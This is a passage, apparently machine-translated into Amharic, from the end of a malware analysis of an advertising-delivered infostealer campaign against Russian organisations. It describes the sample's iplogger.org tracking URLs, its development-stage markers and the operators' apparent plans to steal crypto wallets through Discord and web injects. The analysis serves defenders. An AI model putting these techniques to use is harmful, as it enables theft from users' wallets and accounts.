ፕሮግራሙ በእድገት ላይ መሆኑን የሚያሳይ ሌላ ምልክት አለ. የሁለትዮሽ ፋይሉ ሁለት የiplogger.org ዩአርኤሎችን ያካትታል፣ እና ሁለቱም የሚጠየቁት መረጃ ሲወጣ ነው። ከእነዚህ ዩአርኤሎች ለአንዱ በቀረበ ጥያቄ፣ በማጣቀሻው መስክ ያለው ዋጋ በ"DEV /" ይቀድማል። እንዲሁም ConfuserExን ተጠቅመን ያልታሸገ ስሪት አግኝተናል፣የዚህ ዩአርኤል ተቀባይ DevFeedbackUrl ይባላል። በአከባቢው ተለዋዋጭ ስም ላይ በመመስረት ኦፕሬተሮች የምስጠራ ቦርሳዎችን ለመስረቅ ህጋዊ አገልግሎት Discord እና የድር መጥለፍ ስርዓቱን ለመጠቀም እቅድ እንዳላቸው እናምናለን።

መደምደሚያ

ይህ ዘመቻ በሳይበር ጥቃቶች ህጋዊ የማስታወቂያ አገልግሎቶችን የመጠቀም ምሳሌ ነው። መርሃግብሩ የሩስያ ድርጅቶችን ያነጣጠረ ነው, ነገር ግን የሩሲያ ያልሆኑ አገልግሎቶችን በመጠቀም እንዲህ ዓይነቱን ጥቃት ስናይ አያስደንቅም. መደራደርን ለማስወገድ ተጠቃሚዎች በሚያወርዷቸው ሶፍትዌሮች ምንጭ ስም እርግጠኞች መሆን አለባቸው።

የስምምነት እና የ MITER ATT&CK ባህሪዎች ሙሉ ዝርዝር አመላካቾች በ ላይ ይገኛሉ ማያያዣ.

ምንጭ: hab.com